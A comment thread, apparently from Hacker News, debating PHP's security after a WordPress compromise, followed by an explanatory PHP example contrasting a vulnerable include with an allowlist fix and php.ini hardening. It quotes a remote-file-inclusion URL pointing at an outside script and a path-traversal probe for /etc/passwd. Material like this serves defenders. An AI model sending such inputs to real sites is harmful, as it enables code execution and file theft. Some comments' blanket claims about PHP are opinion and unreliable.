dscrd|11 years ago
I'm being serious. Unless you have Facebook's resources (and probably not even then) DO NOT USE PHP FOR ANYTHING THAT REQUIRES SECURITY! If you are, start a migration process today. Whatever you think it'll cost, it'll be worth it.
If you cannot decide from the billions of choices out there, go with Go. It's hardly perfect, but way better and simple.
ukigumo|11 years ago
Having said this, I've found limited proof that a particular language is any safer than another as it comes down to safe coding policies and risk mitigation strategies.
feld|11 years ago
spacemanmatt|11 years ago
I would estimate PHP is inherently more dangerous than C.
dscrd|11 years ago
Proof is right there in the article. To have PHP on the live server is a security risk, period.
sanswork|11 years ago
dscrd|11 years ago
2. That Go is designed as a programming language.
nadams|11 years ago
Using [your favorite scripting language] doesn't magically make things like SQL injection and other bad practices go away. There are ways to mitigate those issues by using frameworks in those languages - but really the issue here isn't "OMG PHP SUCKS" but rather that WordPress sucks for allowing something like this to work:
> wpadmin.php?include=http://someothersite.com/some-bad-script.php
I have seen that numerous times in my logs. There are settings in PHP configuration where you can actually prevent external downloading of scripts.
However, ignoring the scripting language itself - the server itself could have been mitigated by sitting behind a firewall that does not allow any outbound web browsing (obviously inbound 80 needs to be open - but there is no reason why it should be allowed to "browse" the web). Or even more limited outbound connections.
Go browse some GitHub projects (obviously those not using a framework) by random people in different languages - you will see that, given the opportunity, people will still do stupid things - even if the language makes it really hard to do - as the saying goes, "life finds a way".
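The include pattern nadams describes above, as an added example that is not code from the thread or from WordPress: the vulnerable form, where the request decides what file gets included, next to an allowlist-based replacement, plus the php.ini directives that stop `include` from fetching URLs at all. The page names, the directory layout and the function names here are assumptions made for the example.

```php
<?php
// Added example, not from the original thread.
//
// VULNERABLE: the query string picks the file. If php.ini has
// allow_url_include=On (requires allow_url_fopen=On as well), then
// ?include=http://someothersite.com/some-bad-script.php makes the server
// download and execute attacker code (remote file inclusion). Even with
// remote URLs disabled, ?include=../../../../etc/passwd is still a local
// file inclusion bug.
function includeVulnerable(array $get): void
{
    include $get['include']; // attacker-controlled path or URL
}

// HARDENED: the user supplies a short name, not a path. The name is looked
// up in a fixed map of known pages; anything not in the map is rejected.
// The page names and the base directory are assumptions for this example.
const PAGE_ALLOWLIST = [
    'dashboard' => 'dashboard.php',
    'posts'     => 'posts.php',
    'settings'  => 'settings.php',
];

// Returns the absolute path to include, or null if the name is not allowed.
function resolvePage(?string $name, string $baseDir): ?string
{
    if ($name === null || !isset(PAGE_ALLOWLIST[$name])) {
        return null;
    }
    // The value comes from our own constant table, never from the request,
    // so it cannot carry "..", a scheme such as http://, or a null byte.
    return rtrim($baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . PAGE_ALLOWLIST[$name];
}

function includeHardened(array $get, string $baseDir): void
{
    $path = resolvePage($get['include'] ?? null, $baseDir);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}

// Runtime hardening, independent of application code (php.ini):
//   allow_url_include = Off   ; include/require refuse http://, ftp:// etc.
//   allow_url_fopen   = Off   ; fopen/file_get_contents refuse URLs too
// allow_url_include is PHP_INI_SYSTEM and cannot be changed from a script,
// so the most an application can do is verify it at start-up:
function remoteIncludeDisabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

// Self-check of the allowlist against the kind of input seen in the logs
// quoted above (constructed inputs, not real requests):
$probes = [
    'dashboard',
    'http://someothersite.com/some-bad-script.php',
    '../../../../etc/passwd',
    null,
];
foreach ($probes as $probe) {
    printf("%-48s => %s\n",
        var_export($probe, true),
        resolvePage($probe, __DIR__) ?? 'rejected');
}
printf("allow_url_include disabled: %s\n", remoteIncludeDisabled() ? 'yes' : 'NO');
```

Only the first probe resolves; the URL, the traversal string and the missing parameter are all rejected before `include` is ever reached. The php.ini directives are the belt to that suspenders: even if a vulnerable `include $_GET[...]` survives somewhere, `allow_url_include=Off` turns the remote-inclusion case into a local-file problem, and the egress filtering nadams mentions keeps the web server from fetching a payload over the network in the first place.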